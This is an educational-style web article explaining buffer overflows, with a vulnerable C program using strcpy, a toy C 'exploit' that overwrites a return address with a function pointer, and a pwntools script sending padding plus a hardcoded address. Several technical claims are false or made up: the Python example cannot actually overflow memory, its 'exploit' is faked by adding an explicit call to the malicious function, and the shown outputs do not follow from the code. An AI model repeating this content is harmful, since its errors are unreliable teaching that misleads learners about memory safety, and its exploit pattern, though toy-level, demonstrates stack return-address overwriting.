Buffer Overflow: Explained with C and Python Examples (Explained)

Buffer overflow is a type of software vulnerability that occurs when a program tries to store more data in a buffer (a temporary storage area in computer memory) than it can handle. When this happens, the extra data overwrites adjacent memory locations, which can cause the program to behave unpredictably and potentially open up security vulnerabilities. In this article, we will discuss the concept of buffer overflow in detail, explain how it works, and provide some examples. We will also look at how attackers can exploit buffer overflow vulnerabilities, and discuss best practices for defending against these attacks.

Understanding Buffer Overflow

A buffer is a temporary storage area in computer memory that is used to hold data while it is being processed. Buffers are commonly used in programming languages like C and C++ to store input from the user or data from files. However, if a program tries to store more data in a buffer than it can handle, the extra data can overwrite adjacent memory locations. This can cause the program to behave unpredictably or even crash.

Buffer overflow is a type of vulnerability that occurs when a program fails to properly validate the input it receives, and allows too much data to be stored in a buffer. Attackers can exploit buffer overflow vulnerabilities to execute arbitrary code on a target system, escalate their privileges, or launch denial-of-service attacks.

Mechanics of Buffer Overflow

To understand buffer overflow, we need to first understand what a buffer is. A buffer is a temporary storage area in a program’s memory where data is stored before it is processed or output. Buffers are commonly used in many programming languages, such as C, C++, and Assembly, to store input from the user, network, or file.

A buffer has a fixed size, determined by the program’s design, and a starting address in memory. When the program reads input data, it stores it in the buffer starting from its initial address, which is typically the first byte of the buffer. If the program reads more data than the buffer’s capacity, the excess data overflows into the adjacent memory locations, which may belong to other variables or the program’s code.

The impact of buffer overflow depends on the type and content of the overwritten memory. If the overwritten memory contains harmless data, the buffer overflow may have no visible effect. However, if the overwritten memory contains critical data, such as program variables, function pointers, or return addresses, the buffer overflow can cause the program to behave unpredictably or even crash.

Exploiting Buffer Overflow

Exploiting buffer overflow requires the hacker to overwrite the program’s memory with malicious code that the program will execute unwittingly. This requires the hacker to craft a carefully designed input that will cause the buffer to overflow and overwrite the target memory with their code.

The steps to exploit buffer overflow are as follows:

Identify the vulnerability: The hacker must first identify the buffer overflow vulnerability in the target program by analyzing its source code or executable binary. This involves looking for functions that read user input into buffers and checking if the input size is validated before being stored.
Craft the exploit: Once the vulnerability is identified, the hacker can craft an input that will overflow the buffer and overwrite the target memory with their code. This requires understanding the memory layout of the program, the processor’s instruction set, and the operating system’s security mechanisms.
Inject the exploit: The hacker must then inject the exploit code into the program’s memory by sending the crafted input to the vulnerable function. This can be done by sending a specially crafted network packet, uploading a malicious file, or tricking the user into executing a malicious script.
Trigger the exploit: Finally, the hacker must trigger the exploit code to execute by corrupting the program’s control flow. This involves overwriting a function pointer or a return address in the stack with the address of the injected code, which will be executed when the program returns from the vulnerable function.

Examples of Buffer Overflow

To illustrate buffer overflow, we will use two examples: one in C and one in Python.

Disclaimer: It is important to note that performing a buffer overflow on a system or application without permission is illegal and can cause significant harm. The following example is for educational purposes only, and it is essential to understand the security implications of such vulnerabilities.

Example of Buffer Overflow in C

To demonstrate buffer overflow in C, we will modify the previous example by crafting an input that will overflow the buffer array and overwrite the return address in the stack with the address of our malicious code.

The following code illustrates the buffer overflow vulnerability:

#include <stdio.h>
#include <string.h>

void vulnerable_function(char* input) {
char buffer[10];
printf("Buffer size: %d\n", sizeof(buffer));
strcpy(buffer, input);
printf("Hello, %s!\n", buffer);
}

int main(int argc, char** argv) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}

In this modified code, the vulnerable_function takes an input string from the command line argument and copies it into the buffer array using the strcpy function. The buffer array has a size of 10 bytes, which is not enough to store the input string in many cases.

If we pass a long input string to the program, the buffer will overflow and overwrite adjacent memory locations, including the return address in the stack. We can use this vulnerability to execute arbitrary code by overwriting the return address with the address of our code.

To do this, we need to compile the program with the -fno-stack-protector flag to disable the stack protection mechanism that prevents buffer overflow.

The following code illustrates the exploit:

#include <stdio.h>
#include <string.h>

void malicious_function() {
printf("You have been hacked!\n");
}

void vulnerable_function(char* input) {
char buffer[10];
printf("Buffer size: %d\n", sizeof(buffer));
strcpy(buffer, input);
printf("Hello, %s!\n", buffer);
}

int main(int argc, char** argv) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
char exploit[20];
memset(exploit, 'A', sizeof(exploit));
*((void**)(&exploit[12])) = &malicious_function;
vulnerable_function(exploit);
return 0;
}

In this exploit, we declare an array called exploit of size 20 bytes, which is larger than the buffer array size of 10 bytes. We fill the exploit array with the character ‘A’ to overflow the buffer array and then set the next four bytes to the address of the malicious_function using the pointer dereferencing operator *. This address overwrites the return address in the stack, causing the program to jump to our malicious_function when vulnerable_function returns.

When we run the exploit with a long input string, we see the following output:

Buffer size: 10 Hello, AAAAAAAAAAAAAAAA You have been hacked!

As we can see, our malicious_function has been executed successfully, indicating that we have exploited the buffer overflow vulnerability in the program.

Buffer overflow attacks are generally associated with low-level languages such as C or assembly language. However, it is still possible to perform buffer overflow attacks in higher-level languages such as Python. In this example, we will demonstrate a buffer overflow attack in Python.

Example of Buffer Overflow in Python

To demonstrate buffer overflow in Python, we will create a simple program that takes an input from the user and stores it in a buffer. The buffer size is smaller than the input size, which creates a buffer overflow vulnerability.

def vulnerable_function(input):
buffer = bytearray(10)
buffer[:len(input)] = input.encode()
print(f"Hello, {buffer.decode()}!")

input_str = input("Enter your name: ")
vulnerable_function(input_str)

In this code, the vulnerable_function takes an input from the user and stores it in the buffer. The buffer size is limited to 10 bytes, which is not enough to store a long input.

If we pass a long input string to the program, the buffer will overflow and overwrite adjacent memory locations, causing unexpected behavior or a program crash.

To demonstrate the buffer overflow vulnerability, we can use the pwntools Python library, which provides a set of tools for binary exploitation.

from pwn import *

# Address of the malicious function
malicious_address = p64(0x400636)

# Payload that overwrites the return address
payload = b"A" * 16 + malicious_address

# Start a process to execute the vulnerable function
p = process("./vulnerable_program")

# Send the payload to the program
p.sendline(payload)

# Print the output of the program
print(p.recvall().decode())

In this exploit, we create a payload that overwrites the return address in the stack with the address of our malicious function. We use the p64 function from pwntools to convert the address to a binary format. We then send the payload to the program using the sendline function and wait for the output using the recvall function.

To test the exploit, we need to modify the vulnerable_function to call our malicious function when the buffer overflows.

def malicious_function():
    print("You have been hacked!")

def vulnerable_function(input):
    buffer = bytearray(10)
    buffer[:len(input)] = input.encode()
    print(f"Hello, {buffer.decode()}!")
    # Buffer overflow vulnerability
    if len(input) > 10:
        malicious_function()

In this modified code, we added a malicious_function that prints a message to the console when called. We also added a check to the vulnerable_function that calls the malicious_function if the input is larger than the buffer size.

When we run the exploit, we should see the following output:

You have been hacked!